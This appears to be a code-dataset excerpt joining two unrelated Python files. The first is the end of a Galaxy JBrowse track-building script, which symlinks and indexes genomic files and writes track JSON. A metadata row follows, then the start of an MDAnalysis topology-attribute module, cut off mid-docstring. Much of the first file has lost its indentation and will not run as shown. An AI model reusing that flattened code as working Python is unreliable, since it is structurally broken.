dest = os.path.join(self.outdir, 'data', 'raw', trackData['label'] + '.gff')
self._sort_gff(gff3, dest)
url = os.path.join('raw', trackData['label'] + '.gff.gz')
trackData.update({
"urlTemplate": url,
"storeClass": "JBrowse/Store/SeqFeature/GFF3Tabix",
})
trackData['glyph'] = 'JBrowse/View/FeatureGlyph/Segments'
trackData['trackType'] = 'BlastView/View/Track/CanvasFeatures'
trackData['type'] = 'BlastView/View/Track/CanvasFeatures'
self._add_track_json(trackData)
os.unlink(gff3)
if blastOpts.get('index', 'false') == 'true':
self.tracksToIndex.append("%s" % trackData['label'])
def add_bigwig(self, data, trackData, wiggleOpts, **kwargs):
dest = os.path.join('data', 'raw', trackData['label'] + '.bw')
cmd = ['ln', '-s', data, dest]
self.subprocess_check_call(cmd)
url = os.path.join('raw', trackData['label'] + '.bw')
trackData.update({
"urlTemplate": url,
"storeClass": "JBrowse/Store/SeqFeature/BigWig",
"type": "JBrowse/View/Track/Wiggle/Density",
})
trackData['type'] = wiggleOpts['type']
trackData['variance_band'] = True if wiggleOpts['variance_band'] == 'true' else False
if 'min' in wiggleOpts and 'max' in wiggleOpts:
trackData['min_score'] = wiggleOpts['min']
trackData['max_score'] = wiggleOpts['max']
else:
trackData['autoscale'] = wiggleOpts.get('autoscale', 'local')
trackData['scale'] = wiggleOpts['scale']
self._add_track_json(trackData)
def add_bigwig_multiple(self, data, trackData, wiggleOpts, **kwargs):
urls = []
for idx, bw in enumerate(data):
dest = os.path.join('data', 'raw', trackData['label'] + '_' + str(idx) + '.bw')
cmd = ['ln', '-s', bw[1], dest]
self.subprocess_check_call(cmd)
urls.append({"url": os.path.join('raw', trackData['label'] + '_' + str(idx) + '.bw'), "name": str(idx + 1) + ' - ' + bw[0]})
trackData.update({
"urlTemplates": urls,
"showTooltips": "true",
"storeClass": "MultiBigWig/Store/SeqFeature/MultiBigWig",
"type": "MultiBigWig/View/Track/MultiWiggle/MultiDensity",
})
if 'XYPlot' in wiggleOpts['type']:
trackData['type'] = "MultiBigWig/View/Track/MultiWiggle/MultiXYPlot"
trackData['variance_band'] = True if wiggleOpts['variance_band'] == 'true' else False
if 'min' in wiggleOpts and 'max' in wiggleOpts:
trackData['min_score'] = wiggleOpts['min']
trackData['max_score'] = wiggleOpts['max']
else:
trackData['autoscale'] = wiggleOpts.get('autoscale', 'local')
trackData['scale'] = wiggleOpts['scale']
self._add_track_json(trackData)
def add_bam(self, data, trackData, bamOpts, bam_index=None, **kwargs):
dest = os.path.join('data', 'raw', trackData['label'] + '.bam')
cmd = ['ln', '-s', os.path.realpath(data), dest]
self.subprocess_check_call(cmd)
cmd = ['ln', '-s', os.path.realpath(bam_index), dest + '.bai']
self.subprocess_check_call(cmd)
url = os.path.join('raw', trackData['label'] + '.bam')
trackData.update({
"urlTemplate": url,
"type": "JBrowse/View/Track/Alignments2",
"storeClass": "JBrowse/Store/SeqFeature/BAM",
"chunkSizeLimit": bamOpts.get('chunkSizeLimit', '5000000')
})
# Apollo will only switch to the (prettier) 'bam-read' className if it's not set explicitly in the track config
# So remove the default 'feature' value for these bam tracks
if 'className' in trackData['style'] and trackData['style']['className'] == 'feature':
del trackData['style']['className']
self._add_track_json(trackData)
if bamOpts.get('auto_snp', 'false') == 'true':
trackData2 = copy.copy(trackData)
trackData2.update({
"type": "JBrowse/View/Track/SNPCoverage",
"key": trackData['key'] + " - SNPs/Coverage",
"label": trackData['label'] + "_autosnp",
"chunkSizeLimit": bamOpts.get('chunkSizeLimit', '5000000')
})
self._add_track_json(trackData2)
def add_vcf(self, data, trackData, vcfOpts={}, **kwargs):
dest = os.path.join('data', 'raw', trackData['label'] + '.vcf')
# ln?
cmd = ['ln', '-s', data, dest]
self.subprocess_check_call(cmd)
cmd = ['bgzip', dest]
self.subprocess_check_call(cmd)
cmd = ['tabix', '-p', 'vcf', dest + '.gz']
self.subprocess_check_call(cmd)
url = os.path.join('raw', trackData['label'] + '.vcf.gz')
trackData.update({
"urlTemplate": url,
"type": "JBrowse/View/Track/HTMLVariants",
"storeClass": "JBrowse/Store/SeqFeature/VCFTabix",
})
self._add_track_json(trackData)
def _sort_gff(self, data, dest):
if not os.path.exists(dest):
# Only index if not already done
cmd = "gff3sort.pl --precise '%s' | grep -v \"^$\" > '%s'" % (data, dest)
self.subprocess_popen(cmd)
cmd = ['bgzip', '-f', dest]
self.subprocess_popen(' '.join(cmd))
cmd = ['tabix', '-f', '-p', 'gff', dest + '.gz']
self.subprocess_popen(' '.join(cmd))
def add_features(self, data, format, trackData, gffOpts, **kwargs):
dest = os.path.join(self.outdir, 'data', 'raw', trackData['label'] + '.gff')
self._sort_gff(data, dest)
url = os.path.join('raw', trackData['label'] + '.gff.gz')
trackData.update({
"urlTemplate": url,
"storeClass": "JBrowse/Store/SeqFeature/GFF3Tabix",
})
if 'match' in gffOpts:
trackData['glyph'] = 'JBrowse/View/FeatureGlyph/Segments'
trackType = 'JBrowse/View/Track/CanvasFeatures'
if 'trackType' in gffOpts:
trackType = gffOpts['trackType']
trackData['type'] = trackType
trackData['trackType'] = trackType # Probably only used by old jbrowse versions
if trackType in ['JBrowse/View/Track/CanvasFeatures', 'NeatCanvasFeatures/View/Track/NeatFeatures']:
if 'transcriptType' in gffOpts and gffOpts['transcriptType']:
trackData['transcriptType'] = gffOpts['transcriptType']
if 'subParts' in gffOpts and gffOpts['subParts']:
trackData['subParts'] = gffOpts['subParts']
if 'impliedUTRs' in gffOpts and gffOpts['impliedUTRs']:
trackData['impliedUTRs'] = gffOpts['impliedUTRs']
elif trackType in ['JBrowse/View/Track/HTMLFeatures', 'NeatHTMLFeatures/View/Track/NeatFeatures']:
if 'topLevelFeatures' in gffOpts and gffOpts['topLevelFeatures']:
trackData['topLevelFeatures'] = gffOpts['topLevelFeatures']
self._add_track_json(trackData)
if gffOpts.get('index', 'false') == 'true':
self.tracksToIndex.append("%s" % trackData['label'])
def add_rest(self, url, trackData):
data = {
"label": trackData['label'],
"key": trackData['key'],
"category": trackData['category'],
"type": "JBrowse/View/Track/HTMLFeatures",
"storeClass": "JBrowse/Store/SeqFeature/REST",
"baseUrl": url
}
self._add_track_json(data)
def add_sparql(self, url, query, trackData):
data = {
"label": trackData['label'],
"key": trackData['key'],
"category": trackData['category'],
"type": "JBrowse/View/Track/CanvasFeatures",
"storeClass": "JBrowse/Store/SeqFeature/SPARQL",
"urlTemplate": url,
"queryTemplate": query
}
self._add_track_json(data)
def traverse_to_option_parent(self, splitKey, outputTrackConfig):
trackConfigSubDict = outputTrackConfig
for part in splitKey[:-1]:
if trackConfigSubDict.get(part) is None:
trackConfigSubDict[part] = dict()
trackConfigSubDict = trackConfigSubDict[part]
assert isinstance(trackConfigSubDict, dict), 'Config element {} is not a dict'.format(trackConfigSubDict)
return trackConfigSubDict
def get_formatted_option(self, valType2ValDict, mapped_chars):
assert isinstance(valType2ValDict, dict) and len(valType2ValDict.items()) == 1
for valType, value in valType2ValDict.items():
if valType == "text":
for char, mapped_char in mapped_chars.items():
value = value.replace(mapped_char, char)
elif valType == "integer":
value = int(value)
elif valType == "float":
value = float(value)
else: # boolean
value = {'true': True, 'false': False}[value]
return value
def set_custom_track_options(self, customTrackConfig, outputTrackConfig, mapped_chars):
for optKey, optType2ValDict in customTrackConfig.items():
splitKey = optKey.split('.')
trackConfigOptionParent = self.traverse_to_option_parent(splitKey, outputTrackConfig)
optVal = self.get_formatted_option(optType2ValDict, mapped_chars)
trackConfigOptionParent[splitKey[-1]] = optVal
def process_annotations(self, track):
category = track['category'].replace('__pd__date__pd__', TODAY)
outputTrackConfig = {
'style': {
'label': track['style'].get('label', 'description'),
'className': track['style'].get('className', 'feature'),
'description': track['style'].get('description', ''),
},
'overridePlugins': track['style'].get('overridePlugins', False) == 'True',
'overrideDraggable': track['style'].get('overrideDraggable', False) == 'True',
'maxHeight': track['style'].get('maxHeight', '600'),
'category': category,
}
mapped_chars = {
'>': '__gt__',
'<': '__lt__',
"'": '__sq__',
'"': '__dq__',
'[': '__ob__',
']': '__cb__',
'{': '__oc__',
'}': '__cc__',
'@': '__at__',
'#': '__pd__',
"": '__cn__'
}
for i, (dataset_path, dataset_ext, track_human_label, extra_metadata) in enumerate(track['trackfiles']):
# Unsanitize labels (element_identifiers are always sanitized by Galaxy)
for key, value in mapped_chars.items():
track_human_label = track_human_label.replace(value, key)
log.info('Processing %s / %s', category, track_human_label)
outputTrackConfig['key'] = track_human_label
# We add extra data to hash for the case of REST + SPARQL.
if 'conf' in track and 'options' in track['conf'] and 'url' in track['conf']['options']:
rest_url = track['conf']['options']['url']
else:
rest_url = ''
# I chose to use track['category'] instead of 'category' here. This
# is intentional. This way re-running the tool on a different date
# will not generate different hashes and make comparison of outputs
# much simpler.
hashData = [str(dataset_path), track_human_label, track['category'], rest_url]
hashData = '|'.join(hashData).encode('utf-8')
outputTrackConfig['label'] = hashlib.md5(hashData).hexdigest() + '_%s' % i
outputTrackConfig['metadata'] = extra_metadata
# Colour parsing is complex due to different track types having
# different colour options.
colourOptions = self.cs.parse_colours(track['conf']['options'], track['format'], gff3=dataset_path)
# This used to be done with a dict.update() call, however that wiped out any previous style settings...
for key in colourOptions:
if key == 'style':
for subkey in colourOptions['style']:
outputTrackConfig['style'][subkey] = colourOptions['style'][subkey]
else:
outputTrackConfig[key] = colourOptions[key]
if 'menus' in track['conf']['options']:
menus = self.cs.parse_menus(track['conf']['options'])
outputTrackConfig.update(menus)
customTrackConfig = track['conf']['options'].get('custom_config', {})
if customTrackConfig:
self.set_custom_track_options(customTrackConfig, outputTrackConfig, mapped_chars)
# import pprint; pprint.pprint(track)
# import sys; sys.exit()
if dataset_ext in ('gff', 'gff3', 'bed'):
self.add_features(dataset_path, dataset_ext, outputTrackConfig,
track['conf']['options']['gff'])
elif dataset_ext == 'bigwig':
self.add_bigwig(dataset_path, outputTrackConfig,
track['conf']['options']['wiggle'])
elif dataset_ext == 'bigwig_multiple':
self.add_bigwig_multiple(dataset_path, outputTrackConfig,
track['conf']['options']['wiggle'])
elif dataset_ext == 'bam':
real_indexes = track['conf']['options']['pileup']['bam_indices']['bam_index']
if not isinstance(real_indexes, list):
# <bam_indices>
# <bam_index>/path/to/a.bam.bai</bam_index>
# </bam_indices>
#
# The above will result in the 'bam_index' key containing a
# string. If there are two or more indices, the container
# becomes a list. Fun!
real_indexes = [real_indexes]
self.add_bam(dataset_path, outputTrackConfig,
track['conf']['options']['pileup'],
bam_index=real_indexes[i])
elif dataset_ext == 'blastxml':
self.add_blastxml(dataset_path, outputTrackConfig, track['conf']['options']['blast'])
elif dataset_ext == 'vcf':
self.add_vcf(dataset_path, outputTrackConfig)
elif dataset_ext == 'rest':
self.add_rest(track['conf']['options']['rest']['url'], outputTrackConfig)
elif dataset_ext == 'sparql':
sparql_query = track['conf']['options']['sparql']['query']
for key, value in mapped_chars.items():
sparql_query = sparql_query.replace(value, key)
self.add_sparql(track['conf']['options']['sparql']['url'], sparql_query, outputTrackConfig)
else:
log.warn('Do not know how to handle %s', dataset_ext)
# Return non-human label for use in other fields
yield outputTrackConfig['label']
def add_final_data(self, data):
viz_data = {}
if len(data['visibility']['default_on']) > 0:
viz_data['defaultTracks'] = ','.join(data['visibility']['default_on'])
if len(data['visibility']['always']) > 0:
viz_data['alwaysOnTracks'] = ','.join(data['visibility']['always'])
if len(data['visibility']['force']) > 0:
viz_data['forceTracks'] = ','.join(data['visibility']['force'])
generalData = {}
if data['general']['aboutDescription'] is not None:
generalData['aboutThisBrowser'] = {'description': data['general']['aboutDescription'].strip()}
generalData['view'] = {
'trackPadding': data['general']['trackPadding']
}
generalData['shareLink'] = (data['general']['shareLink'] == 'true')
generalData['show_tracklist'] = (data['general']['show_tracklist'] == 'true')
generalData['show_nav'] = (data['general']['show_nav'] == 'true')
generalData['show_overview'] = (data['general']['show_overview'] == 'true')
generalData['show_menu'] = (data['general']['show_menu'] == 'true')
generalData['hideGenomeOptions'] = (data['general']['hideGenomeOptions'] == 'true')
generalData['plugins'] = data['plugins']
viz_data.update(generalData)
self._add_json(viz_data)
if 'GCContent' in data['plugins_python']:
self._add_track_json({
"storeClass": "JBrowse/Store/Sequence/IndexedFasta",
"type": "GCContent/View/Track/GCContentXY",
"label": "GC Content",
"key": "GCContentXY",
"urlTemplate": "seq/genome.fasta",
"bicolor_pivot": 0.5,
"category": "GC Content",
"metadata": {
"tool_tool": '<a target="_blank" href="https://github.com/elsiklab/gccontent/commit/030180e75a19fad79478d43a67c566ec6">elsiklab/gccontent</a>',
"tool_tool_version": "5c8b0582ecebf9edf684c76af8075fb3d30ec3fa",
"dataset_edam_format": "",
"dataset_size": "",
"history_display_name": "",
"history_user_email": "",
"metadata_dbkey": "",
}
# TODO: Expose params for everyone.
})
self._add_track_json({
"storeClass": "JBrowse/Store/Sequence/IndexedFasta",
"type": "GCContent/View/Track/GCContentXY",
"label": "GC skew",
"key": "GCSkew",
"urlTemplate": "seq/genome.fasta",
"gcMode": "skew",
"min_score": -1,
"bicolor_pivot": 0,
"category": "GC Content",
"metadata": {
"tool_tool": '<a target="_blank" href="https://github.com/elsiklab/gccontent/commit/030180e75a19fad79478d43a67c566ec6">elsiklab/gccontent</a>',
"tool_tool_version": "5c8b0582ecebf9edf684c76af8075fb3d30ec3fa",
"dataset_edam_format": "",
"dataset_size": "",
"history_display_name": "",
"history_user_email": "",
"metadata_dbkey": "",
}
# TODO: Expose params for everyone.
})
if 'ComboTrackSelector' in data['plugins_python']:
with open(os.path.join(self.outdir, 'data', 'trackList.json'), 'r') as handle:
trackListJson = json.load(handle)
trackListJson.update({
"trackSelector": {
"renameFacets": {
"tool_tool": "Tool ID",
"tool_tool_id": "Tool ID",
"tool_tool_version": "Tool Version",
"dataset_edam_format": "EDAM",
"dataset_size": "Size",
"history_display_name": "History Name",
"history_user_email": "Owner",
"metadata_dbkey": "Dbkey",
},
"displayColumns": [
"key",
"tool_tool",
"tool_tool_version",
"dataset_edam_format",
"dataset_size",
"history_display_name",
"history_user_email",
"metadata_dbkey",
],
"type": "Faceted",
"title": ["Galaxy Metadata"],
"icon": "https://galaxyproject.org/images/logos/galaxy-icon-square.png",
"escapeHTMLInData": False
},
"trackMetadata": {
"indexFacets": [
"category",
"key",
"tool_tool_id",
"tool_tool_version",
"dataset_edam_format",
"history_user_email",
"history_display_name"
]
}
})
with open(os.path.join(self.outdir, 'data', 'trackList2.json'), 'w') as handle:
json.dump(trackListJson, handle)
def clone_jbrowse(self, jbrowse_dir, destination):
"""Clone a JBrowse directory into a destination directory.
"""
# JBrowse seems to have included some bad symlinks, cp ignores bad symlinks
# unlike copytree
cmd = ['cp', '-r', os.path.join(jbrowse_dir, '.'), destination]
log.debug(' '.join(cmd))
subprocess.check_call(cmd)
cmd = ['mkdir', '-p', os.path.join(destination, 'data', 'raw')]
log.debug(' '.join(cmd))
subprocess.check_call(cmd)
# http://unix.stackexchange.com/a/38691/22785
# JBrowse releases come with some broken symlinks
cmd = ['find', destination, '-type', 'l', '-xtype', 'l']
log.debug(' '.join(cmd))
symlinks = subprocess.check_output(cmd)
for i in symlinks:
try:
os.unlink(i)
except OSError:
pass
if __name__ == '__main__':
    # CLI: parse the Galaxy-generated track-configuration XML and drive a
    # JbrowseConnector to build the instance.
    parser = argparse.ArgumentParser(description="", epilog="")
    parser.add_argument('xml', type=argparse.FileType('r'), help='Track Configuration')
    parser.add_argument('--jbrowse', help='Folder containing a jbrowse release')
    parser.add_argument('--outdir', help='Output directory', default='out')
    parser.add_argument('--standalone', help='Standalone mode includes a copy of JBrowse', action='store_true')
    parser.add_argument('--version', '-V', action='version', version="%(prog)s 0.8.0")
    args = parser.parse_args()

    tree = ET.parse(args.xml.name)
    root = tree.getroot()

    # This should be done ASAP
    # Module-level global: read by metadata_from_node() when building links.
    GALAXY_INFRASTRUCTURE_URL = root.find('metadata/galaxyUrl').text
    # Sometimes this comes as `localhost` without a protocol
    if not GALAXY_INFRASTRUCTURE_URL.startswith('http'):
        # so we'll prepend `http://` and hope for the best. Requests *should*
        # be GET and not POST so it should redirect OK
        GALAXY_INFRASTRUCTURE_URL = 'http://' + GALAXY_INFRASTRUCTURE_URL

    jc = JbrowseConnector(
        jbrowse=args.jbrowse,
        outdir=args.outdir,
        genomes=[
            {
                'path': os.path.realpath(x.attrib['path']),
                'meta': metadata_from_node(x.find('metadata'))
            }
            for x in root.findall('metadata/genomes/genome')
        ],
        standalone=args.standalone,
        gencode=root.find('metadata/gencode').text
    )

    # Instance-wide settings collected from the XML and handed to
    # jc.add_final_data() at the end.
    extra_data = {
        'visibility': {
            'default_on': [],
            'default_off': [],
            'force': [],
            'always': [],
        },
        'general': {
            'defaultLocation': root.find('metadata/general/defaultLocation').text,
            'trackPadding': int(root.find('metadata/general/trackPadding').text),
            'shareLink': root.find('metadata/general/shareLink').text,
            'aboutDescription': root.find('metadata/general/aboutDescription').text,
            'show_tracklist': root.find('metadata/general/show_tracklist').text,
            'show_nav': root.find('metadata/general/show_nav').text,
            'show_overview': root.find('metadata/general/show_overview').text,
            'show_menu': root.find('metadata/general/show_menu').text,
            'hideGenomeOptions': root.find('metadata/general/hideGenomeOptions').text,
        },
        'plugins': [],
        'plugins_python': [],
    }

    plugins = root.find('plugins').attrib
    if plugins['GCContent'] == 'True':
        extra_data['plugins_python'].append('GCContent')
        extra_data['plugins'].append({
            'location': 'https://cdn.jsdelivr.net/gh/elsiklab/gccontent@5c8b0582ecebf9edf684c76af8075fb3d30ec3fa/',
            'name': 'GCContent'
        })

    # Not needed in 1.16.1: it's built in the conda package now, and this plugin doesn't need to be enabled anywhere
    # if plugins['Bookmarks'] == 'True':
    #     extra_data['plugins'].append({
    #         'location': 'https://cdn.jsdelivr.net/gh/TAMU-CPT/bookmarks-jbrowse@5242694120274c86e1ccd5cb0e5e943e78f82393/',
    #         'name': 'Bookmarks'
    #     })

    # Not needed in 1.16.1: it's built in the conda package now, and this plugin doesn't need to be enabled anywhere
    if plugins['ComboTrackSelector'] == 'True':
        extra_data['plugins_python'].append('ComboTrackSelector')
        # extra_data['plugins'].append({
        #     'location': 'https://cdn.jsdelivr.net/gh/Arabidopsis-Information-Portal/ComboTrackSelector@52403928d5ccbe2e3a86b0fa5eb8e61c0f2e2f57/',
        #     'icon': 'https://galaxyproject.org/images/logos/galaxy-icon-square.png',
        #     'name': 'ComboTrackSelector'
        # })

    if plugins['theme'] == 'Minimalist':
        extra_data['plugins'].append({
            'location': 'https://cdn.jsdelivr.net/gh/erasche/jbrowse-minimalist-theme@d698718442da306cf87f033c72ddb745f3077775/',
            'name': 'MinimalistTheme'
        })
    elif plugins['theme'] == 'Dark':
        extra_data['plugins'].append({
            'location': 'https://cdn.jsdelivr.net/gh/erasche/jbrowse-dark-theme@689eceb7e33bbc1b9b15518d45a5a79b2e5d0a26/',
            'name': 'DarkTheme'
        })

    if plugins['BlastView'] == 'True':
        extra_data['plugins_python'].append('BlastView')
        extra_data['plugins'].append({
            'location': 'https://cdn.jsdelivr.net/gh/TAMU-CPT/blastview@97572a21b7f011c2b4d9a0b5af40e292d694cbef/',
            'name': 'BlastView'
        })

    for track in root.findall('tracks/track'):
        track_conf = {}
        track_conf['trackfiles'] = []

        is_multi_bigwig = False
        try:
            if track.find('options/wiggle/multibigwig') and (track.find('options/wiggle/multibigwig').text == 'True'):
                is_multi_bigwig = True
                multi_bigwig_paths = []
        except KeyError:
            pass

        trackfiles = track.findall('files/trackFile')
        if trackfiles:
            for x in track.findall('files/trackFile'):
                if is_multi_bigwig:
                    # Collect (label, path) pairs; appended as one combined
                    # track after this loop.
                    multi_bigwig_paths.append((x.attrib['label'], os.path.realpath(x.attrib['path'])))
                else:
                    if trackfiles:
                        metadata = metadata_from_node(x.find('metadata'))

                        track_conf['trackfiles'].append((
                            os.path.realpath(x.attrib['path']),
                            x.attrib['ext'],
                            x.attrib['label'],
                            metadata
                        ))
        else:
            # For tracks without files (rest, sparql)
            track_conf['trackfiles'].append((
                '',  # N/A, no path for rest or sparql
                track.attrib['format'],
                track.find('options/label').text,
                {}
            ))

        if is_multi_bigwig:
            metadata = metadata_from_node(x.find('metadata'))

            track_conf['trackfiles'].append((
                multi_bigwig_paths,  # Passing an array of paths to represent as one track
                'bigwig_multiple',
                'MultiBigWig',  # Giving an hardcoded name for now
                {}  # No metadata for multiple bigwig
            ))

        track_conf['category'] = track.attrib['cat']
        track_conf['format'] = track.attrib['format']
        try:
            # Only pertains to gff3 + blastxml. TODO?
            track_conf['style'] = {t.tag: t.text for t in track.find('options/style')}
        except TypeError:
            track_conf['style'] = {}
            pass
        track_conf['conf'] = etree_to_dict(track.find('options'))
        # process_annotations is a generator yielding one hashed label per
        # track added; record each under the requested visibility bucket.
        keys = jc.process_annotations(track_conf)

        for key in keys:
            extra_data['visibility'][track.attrib.get('visibility', 'default_off')].append(key)

    jc.add_final_data(extra_data)
    jc.generate_names()
|
gvlproject/tools-iuc
|
tools/jbrowse/jbrowse.py
|
Python
|
mit
| 46,361
|
[
"BLAST",
"Galaxy"
] |
49e9e40c05f0113a08394281a092026a88fdf0d17f859bebb0a4e14a6436a60d
|
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
# doi: 10.25080/majora-629e541a-00e
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
r"""
Topology attribute objects --- :mod:`MDAnalysis.core.topologyattrs`
===================================================================
Common :class:`TopologyAttr` instances that are used by most topology
parsers.
TopologyAttrs are used to contain attributes such as atom names or resids.
These are usually read by the TopologyParser.
"""
from collections import defaultdict
import copy
import functools
import itertools
import numbers
from inspect import signature as inspect_signature
import warnings
import textwrap
from types import MethodType
import Bio.Seq
import Bio.SeqRecord
import numpy as np
from ..lib.util import (cached, convert_aa_code, iterable, warn_if_not_unique,
unique_int_1d)
from ..lib import transformations, mdamath
from ..exceptions import NoDataError, SelectionError
from .topologyobjects import TopologyGroup
from . import selection
from .groups import (ComponentBase, GroupBase,
Atom, Residue, Segment,
AtomGroup, ResidueGroup, SegmentGroup,
check_wrap_and_unwrap, _pbc_to_wrap)
from .. import _TOPOLOGY_ATTRS, _TOPOLOGY_TRANSPLANTS, _TOPOLOGY_ATTRNAMES
def _check_length(func):
    """Decorator for ``set_X`` methods that validates the size of *values*.

    Components (Atom/Residue/Segment) only accept a single (scalar) value;
    groups accept either a scalar or exactly one value per member.  A
    :exc:`ValueError` is raised before *func* runs if that contract is
    violated::

        @_check_length
        def set_X(self, group, values):
            ...
    """
    _SINGLE_VALUE_ERROR = ("Setting {cls} {attrname} with wrong sized input. "
                           "Must use single value, length of supplied values: {lenvalues}.")
    # Eg "Setting Residue resid with wrong sized input. Must use single value, length of supplied
    # values: 2."

    _GROUP_VALUE_ERROR = ("Setting {group} {attrname} with wrong sized array. "
                          "Length {group}: {lengroup}, length of supplied values: {lenvalues}.")
    # Eg "Setting AtomGroup masses with wrong sized array. Length AtomGroup: 100, length of
    # supplied values: 50."

    def _value_count(values):
        # Scalars (strings, numbers) count as 0; anything iterable reports
        # its true length.
        return len(values) if iterable(values) else 0

    @functools.wraps(func)
    def wrapper(attr, group, values):
        nvals = _value_count(values)
        if isinstance(group, ComponentBase):
            # A single component: only a scalar value is acceptable.
            if nvals != 0:
                raise ValueError(_SINGLE_VALUE_ERROR.format(
                    cls=group.__class__.__name__, attrname=attr.singular,
                    lenvalues=nvals))
        elif nvals not in (0, len(group)):
            # A group: scalar, or exactly one value per member.
            raise ValueError(_GROUP_VALUE_ERROR.format(
                group=group.__class__.__name__, attrname=attr.attrname,
                lengroup=len(group), lenvalues=nvals))
        # Size checks passed; delegate to the wrapped setter.
        return func(attr, group, values)

    return wrapper
def _wronglevel_error(attr, group):
    """Build the error raised when *attr* is set on the wrong level.

    Example: setting the mass of a Residue (attr=Masses, group=residue)
    yields a :exc:`NotImplementedError` telling the user to go through
    ``Residue.atoms.masses`` instead.  Keeps such messages consistent and
    helpful everywhere.
    """
    # Topology level of the offending component/group.
    if isinstance(group, (Atom, AtomGroup)):
        group_level = 1
    elif isinstance(group, (Residue, ResidueGroup)):
        group_level = 2
    elif isinstance(group, (Segment, SegmentGroup)):
        group_level = 3

    # Topology level the attribute itself lives at, plus the accessor
    # names (plural, singular) used to reach that level.
    if isinstance(attr, AtomAttr):
        plural, singular = 'atoms', 'atom'
        attr_level = 1
    elif isinstance(attr, ResidueAttr):
        plural, singular = 'residues', 'residue'
        attr_level = 2
    elif isinstance(attr, SegmentAttr):
        plural, singular = 'segments', 'segment'
        attr_level = 3

    # Going downwards use plurals, going upwards use singulars:
    # Residue.atom!s!.mass!es! but Atom.segment!!.segid!!
    if isinstance(group, ComponentBase) and (attr_level > group_level):
        correct, attrname = singular, attr.singular
    else:
        correct, attrname = plural, attr.attrname

    err_msg = "Cannot set {attr} from {cls}. Use '{cls}.{correct}.{attr} = '"
    # eg "Cannot set masses from Residue. 'Use Residue.atoms.masses = '"
    return NotImplementedError(err_msg.format(
        attr=attrname, cls=group.__class__.__name__, correct=correct,
    ))
def _build_stub(method_name, method, attribute_name):
    """Create a placeholder for a transplanted method.

    The stub is a dummy method attached to a core class (usually from
    :mod:`MDAnalysis.core.groups`) that raises a :exc:`NoDataError` when
    called.  It borrows the original method's documentation traits
    (docstring, name, signature) so introspection keeps working, and is
    overwritten by the real method when the topology attribute is
    transplanted at universe creation.

    Parameters
    ----------
    method_name: str
        The name of the attribute in the destination class.
    method: Callable
        The method to be mimicked.
    attribute_name: str
        The name of the topology attribute that must be present for the
        method to be relevant (e.g. masses, charges, ...)

    Returns
    -------
    The stub.
    """
    def stub_method(self, *args, **kwargs):
        # any call on the stub means the required attribute is absent
        raise NoDataError(
            '{class_name}.{method_name}() '
            'not available; this requires {attribute_name}'.format(
                class_name=self.__class__.__name__,
                method_name=method_name,
                attribute_name=attribute_name,
            )
        )
    annotation = textwrap.dedent("""\
    .. note::
      This requires the underlying topology to have {}. Otherwise, a
      :exc:`~MDAnalysis.exceptions.NoDataError` is raised.
    """.format(attribute_name))
    # the original docstring has an unindented first line and indented
    # remainder, so only the remainder is dedented before the note goes on
    first_line, rest = method.__doc__.split('\n', 1)
    stub_method.__doc__ = '{}\n{}\n\n{}'.format(
        first_line, textwrap.dedent(rest), annotation)
    stub_method.__name__ = method_name
    stub_method.__signature__ = inspect_signature(method)
    return stub_method
def _attach_transplant_stubs(attribute_name, topology_attribute_class):
    """Attach a placeholder stub for every transplantable method.

    Parameters
    ----------
    attribute_name: str
        User-facing name of the topology attribute (e.g. masses, charges, ...)
    topology_attribute_class:
        Topology attribute class to inspect for transplant methods.
    """
    for destination, methods in topology_attribute_class.transplants.items():
        if destination == 'Universe':
            # imported lazily: a top-level import would be circular
            from .universe import Universe
            destination = Universe
        for method_name, callback in methods:
            # Underscore-prefixed names are not user facing, and may be
            # operator methods that must not be shadowed by a stub; the
            # stubs only matter for user-facing methods and properties.
            if method_name.startswith('_'):
                continue
            try:
                # properties carry their getter in .fget
                getter = callback.fget
            except AttributeError:
                stub = _build_stub(method_name, callback, attribute_name)
                setattr(destination, method_name, stub)
            else:
                stub = _build_stub(method_name, getter, attribute_name)
                setattr(destination, method_name, property(stub, None, None))
# TODO: remove bfactors in 3.0
# Deprecation message shared by every bfactor alias (the Tempfactors
# transplants and the selection keyword registered in _TopologyAttrMeta).
BFACTOR_WARNING = ("The bfactor topology attribute is only "
                   "provided as an alias to the tempfactor "
                   "attribute. It will be removed in "
                   "3.0. Please use the tempfactor attribute "
                   "instead.")
def deprecate_bfactor_warning(func):
    """Wrap a bfactor alias so that using it emits a DeprecationWarning.

    Parameters
    ----------
    func : Callable
        The tempfactor-backed getter/setter (or selection ``apply``) being
        exposed under the deprecated ``bfactor``/``bfactors`` name.

    Returns
    -------
    Callable
        ``func`` wrapped to warn with :data:`BFACTOR_WARNING` before
        delegating to ``func``.
    """
    # functools.wraps preserves the wrapped function's __name__/__doc__/
    # signature; without it the bfactor properties built from these
    # wrappers all report the anonymous wrapper's metadata.
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        warnings.warn(BFACTOR_WARNING, DeprecationWarning)
        return func(*args, **kwargs)
    return wrapper
class _TopologyAttrMeta(type):
    r"""Register TopologyAttrs on class creation
    Each topology attribute is added to the top-level dictionaries
    for various record purposes. The class itself is added to
    :data:`_TOPOLOGY_ATTRS` and :data:`_TOPOLOGY_ATTRNAMES`. Transplanted
    methods are also added to :data:`_TOPOLOGY_TRANSPLANTS.`
    We also attempt to make the topology attribute selectable with
    atom selection language by automatically generating a relevant
    selection class with the singular name (``singular``) as the
    selection token. Only certain ``dtype``\ s are supported; if a
    selection class cannot be generated, a warning will be raised
    but no error.
    See also
    --------
    :func:`MDAnalysis.core.selection.gen_selection_class`
    """
    def __init__(cls, name, bases, classdict):
        # Initialise the newly created class itself.  (This previously
